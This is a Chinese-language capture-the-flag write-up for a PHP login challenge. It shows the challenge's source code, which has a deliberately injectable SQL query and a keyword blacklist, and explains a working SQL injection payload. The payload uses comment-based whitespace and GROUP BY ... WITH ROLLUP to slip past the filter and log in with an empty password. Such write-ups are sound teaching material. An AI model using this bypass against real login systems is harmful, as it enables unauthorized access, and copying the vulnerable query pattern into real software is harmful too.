wp

打开题目：

点“取消”下载源码：

<?php
		$flag="";
        function replaceSpecialChar($strParam){
    
             $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i";
             return preg_replace($regex,"",$strParam);
        }
        if (!$con)
        {
    
            die('Could not connect: ' . mysqli_error());
        }
		if(strlen($username)!=strlen(replaceSpecialChar($username))){
    
			die("sql inject error");
		}
		if(strlen($password)!=strlen(replaceSpecialChar($password))){
    
			die("sql inject error");
		}
		$sql="select * from user where username = '$username'";
		$result=mysqli_query($con,$sql);
			if(mysqli_num_rows($result)>0){
    
					while($row=mysqli_fetch_assoc($result)){
    
						if($password==$row['password']){
    
							echo "登陆成功<br>";
							echo $flag;
						}

					 }
			}
    ?>

屏蔽了大部分关键字。
这里要介绍到group by和with rollup
group by能够对结果按指定key进行排序，而with rollup 能够在此基础上再做汇总统计
效果就像这样

关键在于，虽然with rollup能够进行汇总，但是对于字符串，汇总结果就是NULL。
这样就添加出了 username='xiaoming' password为空 一组数据。

所以构造payload:

username=admin'/**/or/**/1=1/**/group/**/by/**/password/**/with/**/rollup#&password=

解析：
这里闭合也不一定是admin ，保持为真即可。
并且，在源码中，是先筛选username，在返回结果中对比password是否相同。
加入payload后就是，筛选出所有结果，password为空，比对后正好有为空的密码，所以登录成功。

登录成功界面。